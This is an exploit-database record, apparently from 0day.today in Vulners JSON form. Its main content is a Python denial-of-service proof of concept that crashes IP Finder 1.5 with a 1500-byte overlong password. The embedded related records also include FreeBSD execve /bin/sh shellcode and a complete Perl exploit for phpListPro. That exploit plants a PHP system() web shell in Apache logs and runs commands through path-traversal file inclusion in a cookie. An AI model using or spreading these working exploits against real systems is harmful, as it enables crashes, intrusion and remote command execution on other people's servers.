ID 1337DAY-ID-30872 Type zdt Reporter Shubham Singh Modified 2018-08-13T00:00:00
Description
Exploit for windows platform in category dos / poc
# Exploit Title: IP Finder 1.5 - Denial of Service (PoC)
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-12
# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder
# Tested Version: 1.5
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the Search&Config Tool program paste the content of
# "exploit.txt" in password field. You will see a crash.
#!/usr/bin/python
buffer = "A" * 1500
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# 0day.today [2018-08-13] #
{"id": "1337DAY-ID-30872", "bulletinFamily": "exploit", "title": "IP Finder 1.5 - Denial of Service Exploit", "description": "Exploit for windows platform in category dos / poc", "published": "2018-08-13T00:00:00", "modified": "2018-08-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/30872", "reporter": "Shubham Singh", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-08-13T22:16:46", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "e84f3b9d55501048fea29c7280457ffd"}, {"key": "modified", "hash": "1865261413c3db59730e6f4c15d45b87"}, {"key": "published", "hash": "1865261413c3db59730e6f4c15d45b87"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "521cde1cee0485e7a9a347fe8363f9e4"}, {"key": "sourceData", "hash": "6b1d23f23b0064776c84e046c160b9fc"}, {"key": "sourceHref", "hash": "498ffd8be88a7cb6a1c9f0036e79b78b"}, {"key": "title", "hash": "aed8d65e290677342ef37e20894ae1fb"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "cb9674bc8a20f665869c23df16b0adc45264d7cdd5b362b5a5a959489a03903a", "viewCount": 10, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-08-13T22:16:46"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13836", "SECURITYVULNS:DOC:30872", "SECURITYVULNS:VULN:429", "SECURITYVULNS:DOC:429"]}, {"type": "zdt", "idList": ["1337DAY-ID-7033", "1337DAY-ID-429"]}], "modified": "2018-08-13T22:16:46"}, "vulnersScore": -0.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/30872", "sourceData": "# Exploit Title: IP Finder 1.5 - Denial of Service (PoC) \r\n# Author: Shubham Singh\r\n# Known As: Spirited Wolf [Twitter: @Pwsecspirit]\r\n# Discovey Date: 2018-08-12\r\n# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder\r\n# Tested Version: 1.5\r\n# Tested on OS: Windows XP Service Pack 3 x86\r\n# Steps to Reproduce: Run the python exploit script, it will create a new \r\n# file with the name \"exploit.txt\" just copy the text inside \"exploit.txt\"\r\n# and start the Search&Config Tool program paste the content of \r\n# \"exploit.txt\" in password field. You will see a crash.\r\n \r\n#!/usr/bin/python\r\n \r\nbuffer = \"A\" * 1500\r\n \r\npayload = buffer\r\ntry:\r\n f=open(\"exploit.txt\",\"w\")\r\n print \"[+] Creating %s bytes evil payload..\" %len(payload)\r\n f.write(payload)\r\n f.close()\r\n print \"[+] File created!\"\r\nexcept:\r\n print \"File cannot be created\"\n\n# 0day.today [2018-08-13] #"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-06-14T00:00:00", "published": "2014-06-14T00:00:00", "id": "SECURITYVULNS:VULN:13836", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13836", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\nHello 3APA3A!\r\n \r\nThese are Login Enumeration, Brute Force and Insufficient Anti-automation vulnerabilities in Catapulta I.W. Edition.\r\n \r\nThis is commercial CMS. It's used at web site of one presidential contender in Ukraine (the elections were last Sunday), where I found these vulnerabilities at 28.01.2014. This politic never cared about security of his web site and his site was hacked in 2009, so no surprise he used vulnerable CMS this year too and still haven't fixed holes - as these ones, as many others. There are many interesting Information Leakage vulnerabilities at that web site, but as I found they are related to site configuration or non-default CMS configuration and are not present at other sites on Catapulta.\r\n \r\n-------------------------\r\nAffected products:\r\n-------------------------\r\n \r\nVulnerable are all versions of Catapulta I.W. Edition.\r\n \r\n-------------------------\r\nAffected vendors:\r\n-------------------------\r\n \r\nPula Design - developer of Catapulta.\r\nhttp://pula.com.ua\r\n \r\n----------\r\nDetails:\r\n----------\r\n \r\nLogin Enumeration (WASC-42):\r\n \r\nhttp://site/admin/login.php\r\n \r\nDifferent answers allow to enumerate logins in the system.\r\n \r\nBrute Force (WASC-11):\r\n \r\nhttp://site/admin/login.php\r\n \r\nThere is no protection from Brute Force attacks.\r\n \r\nInsufficient Anti-automation (WASC-21):\r\n \r\nIn contact form (http://site/messageadmin.html) there is no protection against automated attacks.\r\n \r\n------------\r\nTimeline:\r\n------------\r\n \r\n2014.02.28 - announced at my site.\r\n2014.03.07 - informed developers. Ignored.\r\n2014.05.30 - disclosed at my site (http://websecurity.com.ua/7033/).\r\n \r\nBest wishes & regards,\r\nMustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\r\n", "modified": "2014-06-14T00:00:00", "published": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30872", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30872", "title": "LE, BF and IAA vulnerabilities in Catapulta I.W. Edition", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-10T17:21:47", "bulletinFamily": "exploit", "description": "Exploit for freebsd/x86 platform in category shellcode", "modified": "2006-09-26T00:00:00", "published": "2006-09-26T00:00:00", "id": "1337DAY-ID-7033", "href": "https://0day.today/exploit/description/7033", "type": "zdt", "title": "freebsd/x86 execve /bin/sh 23 bytes", "sourceData": "===================================\r\nfreebsd/x86 execve /bin/sh 23 bytes\r\n===================================\r\n\r\n\r\n\r\n\r\n/* FreeBSD 23 byte execve code. Greetz to anathema, the first who published *\r\n * this way of writing shellcodes. *\r\n * greetz to preedator marcetam *\r\n * [email\u00a0protected] *\r\n ****************************************************************************/\r\n\r\nchar fbsd_execve[]=\r\n \"\\x99\" /* cdq */\r\n \"\\x52\" /* push %edx */\r\n \"\\x68\\x6e\\x2f\\x73\\x68\" /* push $0x68732f6e */\r\n \"\\x68\\x2f\\x2f\\x62\\x69\" /* push $0x69622f2f */\r\n \"\\x89\\xe3\" /* movl %esp,%ebx */\r\n \"\\x51\" /* push %ecx - or %edx :) */\r\n \"\\x52\" /* push %edx - or %ecx :) */\r\n \"\\x53\" /* push %ebx */\r\n \"\\x53\" /* push %ebx */\r\n \"\\x6a\\x3b\" /* push $0x3b */\r\n \"\\x58\" /* pop %eax */\r\n \"\\xcd\\x80\"; /* int $0x80 */\r\n\r\nint main() {\r\n void (*run)()=(void *)fbsd_execve;\r\n printf(\"%d bytes \\n\",strlen(fbsd_execve));\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7033"}, {"lastseen": "2018-02-15T19:13:57", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-05-19T00:00:00", "published": "2006-05-19T00:00:00", "id": "1337DAY-ID-429", "href": "https://0day.today/exploit/description/429", "type": "zdt", "title": "phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit", "sourceData": "============================================================\r\nphpListPro <= 2.0.1 (Language) Remote Code Execution Exploit\r\n============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit\r\n# URL: http://www.smartisoft.com/\r\n#\r\n# Info: \r\n# - arbitrary local inclusion \r\n# - need magic_quotes_gpc=off\r\n# \r\n#\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n#ripped from rgod\r\n\r\n@apache=(\r\n \"/var/log/httpd/access_log%00\",\r\n \"/var/log/httpd/error_log%00\",\r\n \"/var/log/apache/error.log%00\",\r\n \"/var/log/apache/access.log%00\", \r\n \"/apache/logs/error.log%00\",\r\n \"/apache/logs/access.log%00\",\r\n \"/etc/httpd/logs/acces_log%00\",\r\n \"/etc/httpd/logs/acces.log%00\",\r\n \"/etc/httpd/logs/error_log%00\",\r\n \"/etc/httpd/logs/error.log%00\",\r\n \"/var/www/logs/access_log%00\",\r\n \"/var/www/logs/access.log%00\",\r\n \"/usr/local/apache/logs/access_log%00\",\r\n \"/usr/local/apache/logs/access.log%00\",\r\n \"/var/log/apache/access_log%00\",\r\n \"/var/log/apache/access.log%00\",\r\n \"/var/log/access_log%00\",\r\n \"/var/www/logs/error_log%00\",\r\n \"/www/logs/error.log%00\",\r\n \"/usr/local/apache/logs/error_log%00\",\r\n \"/usr/local/apache/logs/error.log%00\",\r\n \"/var/log/apache/error_log%00\",\r\n \"/var/log/apache/error.log%00\",\r\n \"/var/log/access_log%00\",\r\n \"/var/log/error_log%00\",\r\n);\r\n\r\nprint \"[i] phpListPro remote command execution exploit\\n\";\r\nprint \"[i] Need magic_quotes_gpc=off\\n\";\r\nprint \"[i] Coded by [Oo]\\n\\n\";\r\n\r\n\r\nif (@ARGV < 3)\r\n{\r\n\tprint \"[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\\n\\n\";\r\n\tprint \"[*] Apache_Path: \\n\";\r\n\t$i = 0;\r\n\twhile($apache[$i])\r\n\t{\r\n\t\tprint \"[$i] $apache[$i]\\n\";\r\n\t\t$i++;\r\n\t}\r\n\tprint \"\\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\\n\";\r\n\texit();\r\n}\r\n\r\n$serv=$ARGV[0];\r\n$path=$ARGV[1];\r\n$type=$ARGV[2];\r\n\r\nprint \"[+] Injecting some code in log files...\\n\";\r\n#ripped from rgod\r\n$CODE=\"<?php ob_clean();system(\\$HTTP_COOKIE_VARS[cmd]);die;?>\";\r\n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>\"80\") or die \"[-] Connecting ... Could not connect to host.\\n\\n\";\r\nprint $socket \"GET \".$path.$CODE.\" HTTP/1.1\\r\\n\";\r\nprint $socket \"User-Agent: \".$CODE.\"\\r\\n\";\r\nprint $socket \"Host: \".$serv.\"\\r\\n\";\r\nprint $socket \"Connection: close\\r\\n\\r\\n\";\r\nclose($socket);\r\n\r\nprint \"[+] Ok! Now here the shell, type exit to quit\\n\";\r\nprint \"[+] If it's not work maybe try another apache_path...\\n\\n\";\r\n\r\nprint \"[shell] \";\r\n$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"exit\")\r\n{\r\n\t$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>\"80\") or die \"[-] Connecting ... Could not connect to host.\\n\\n\";\r\n\t\r\n\tprint $socket \"GET \".$path.\"config.php HTTP/1.1\\r\\n\";\r\n\tprint $socket \"Host: \".$serv.\"\\r\\n\";\r\n\tprint $socket \"Accept: */*\\r\\n\";\r\n\tprint $socket \"Cookie: Language=/../../../../../../../../../..\".$apache[$type].\";cmd=$cmd \\r\\n\";\r\n\tprint $socket \"Connection: close\\r\\n\\n\";\t\r\n\t\r\n\twhile ($answer = <$socket>)\r\n\t{\r\n\t\tprint $answer;\r\n\t}\r\n\t\r\n\tprint \"[shell] \";\r\n\t$cmd = <STDIN>;\t\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/429"}]}
